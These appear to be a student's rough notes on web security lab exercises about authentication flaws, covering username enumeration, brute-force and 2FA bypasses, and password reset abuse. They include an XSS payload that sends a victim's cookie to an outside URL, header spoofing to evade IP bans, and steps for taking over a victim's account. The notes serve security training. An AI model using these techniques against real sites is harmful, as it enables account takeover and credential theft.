1. Username enumeration via different responses

	investigate the login page and submit an invalid username and password then go to the intruder
	then clear to remove any automatically assigned payloads positions,only select username position
	leave the pass as any static value for now , then start attack view the result we can notice that
	length has been changed than any other value so this is correct username now we can input the 
	correct username than we we will select pass field and brute force on that field we will see 
	302 response if the csrf token does not valid use than refresh the login page

2. Username enumeration via subtly different responses

	Grep - Extract  in the dialog  scroll down through the response until you find the error message
	Invalid username or password start attack

3. Username enumeration via response timing

	if you try to login from one ip 3 or 4 attempts, server will ban your ip for 30 min so you can 
	check if the X-Forwarded-For: valids in back end server then you will change the value of the
	header 
	Back in your browser, reload the login page so that you have a valid CSRF token. Then, log in 		using the username and password that you noted down. 

4. Broken brute-force protection, IP block
	 Your credentials: wiener:peter
	 Victim's username: carlos 
	weiner peter
	carlos 1234
	weiner peter
	carlos wwer
	weiner peter
	carlos montoya correct
	burp intruder pitchfork method will be used

5. Username enumeration via account lock

	to bypass you need to add another parameter in intruder &count=ยง0ยง then select username and 
	count then set the count value to 5 and select the cluster bomp method to do brute force attack
	observe response look over any changes that you can find

6. Broken brute-force protection, multiple credentials per request


"username" : "pots"
"username" : "carlos",
"password" : [
    "123456",
    "password",
    "qwerty"
    ...
]

7. 2FA simple bypass

	enter in a valid account then go to the account and see the parameter in url 
	"my-account?id=wiener" then go to the victim account authentication code will not be required
	so we can change the name to victim then we can bypass 2FA 

8. 2FA broken logic

	now login as known username and pass then change the name from wienr to carlos and brute force
	the 2FA and aware of csrf token if u logout your csrf token will be expired

9. 2FA bypass using a brute-force attack

10. Brute-forcing a stay-logged-in cookie

11. Offline password cracking

	create a js script <script> document.location='url/'+document.cookie</script> then send it to
	victim then we will get victims username and pass in base64 encoding or in any other format
	then you get hashed pass and go to the crackingstation.net and decrypt it 

12.Password reset broken logic
	at first click on forgot password
	this time we will access our password reset page through mail server and now we will make null
	to our csrf tokens and replace my name to victims and reset the password of victim so that we
	bypass the victim account

13. Password reset poisoning via middleware

14. Password brute-force via password change

